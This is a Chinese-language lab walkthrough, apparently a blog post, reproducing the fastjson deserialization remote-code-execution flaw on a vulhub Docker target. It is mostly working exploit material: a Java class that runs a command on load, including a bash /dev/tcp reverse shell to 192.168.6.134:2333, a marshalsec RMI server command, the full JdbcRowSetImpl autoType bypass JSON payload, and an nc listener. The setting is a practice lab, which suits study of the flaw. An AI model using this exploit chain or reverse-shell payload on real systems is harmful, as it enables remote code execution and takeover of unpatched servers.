目录
一. 前期准备:
二. fastjson简介
三. 漏洞复现(一):创建文件
三. 漏洞复现(二):反弹shell
一. 前期准备:
1. 安装jdk,并配置环境:Kali安装JDK 1.8的详细过程_m0_54899775的博客-CSDN博客
2.安装maven,并配置环境:kali linux安装maven_m0_54899775的博客-CSDN博客
3.安装vulhub靶场环境:Kali Linux 2020安装vulhub_m0_54899775的博客-CSDN博客
4.安装反序列化工具marshalsec:下载和安装marshalsec_m0_54899775的博客-CSDN博客
二. fastjson简介
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。使用比较广泛。
三. 漏洞复现(一):创建文件
1.启动靶场:
docker-compose up -d
先启动vulhub的fastjson 1.2.47漏洞环境
Docker开启的8090端口
假设我们目标IP为192.168.6.134(虚拟机ip),此时我们访问192.168.6.134:8090
2.在vulhub下的fastjson 1.2.47文件夹下保存以下代码为TouchFile.java文件(文件名可随便起):
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success22"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
3.编译.java文件,生成.class文件:
javac TouchFile.java
4.把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在的目录,Python起一个http服务。
python -m SimpleHTTPServer 4444
然后查看此网址,会发现新建的文件:
5.使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
cd marshalsec/ mvn clean package -DskipTests
出现以下画面表示编译成功:
成功以后会在target目录下生成marshalsec-0.0.3-SNAPSHOT-all.jar文件
6.接下来开启RMI服务
marshalsec-master/target# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.6.134:4444/#TouchFile" 9999
其中ip地址为上面开通http服务的网址(我这里为虚拟机的ip:4444).
7.刷新靶场(http://192.168.6.134:8090)的链接,抓包后改GET包为POST包,然后在发送的请求数据包中输入以下payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.6.134:9999/TouchFile",
"autoCommit":true
}
}
修改过后,点击go开始运行,便会得到上图又部分的信息,以及下图中信息:
8.查看docker中新建文件情况:
(1)查看运行中的docker
docker ps
(2)进入docker:
docker exec -it dockerID /bin/sh
(3)查看目录:
三. 漏洞复现(二):反弹shell
1.启动靶场:
docker-compose up -d
先启动vulhub的fastjson 1.2.24漏洞环境
Docker开启的8090端口
假设我们目标IP为192.168.6.134(虚拟机ip),此时我们访问192.168.6.134:8090
2.在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件(文件名可随便起):
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.6.134/2333 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
3.编译.java文件,生成.class文件:
javac TouchFile.java
4.把编译好的class文件传到外网系统中(这里我传到kali服务器中),并在class文件所在的目录,Python起一个http服务。
python -m SimpleHTTPServer 4444
然后查看此网址,会发现新建的文件:
5.使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class:
cd marshalsec/ mvn clean package -DskipTests
出现以下画面表示编译成功:
成功以后会在target目录下生成marshalsec-0.0.3-SNAPSHOT-all.jar文件
6.接下来开启RMI服务
marshalsec-master/target# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.6.134:4444/#TouchFile" 9999
其中ip地址为上面开通http服务的网址(我这里为虚拟机的ip:4444).
7.开启payload中的端口,进行监听:
nc -lvp 2333
8.刷新靶场(http://192.168.6.134:8090)的链接,抓包后改GET包为POST包,然后在发送的请求数据包中输入以下payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.6.134:9999/TouchFile",
"autoCommit":true
}
}
点击go,都会有反应
成功反弹shell。
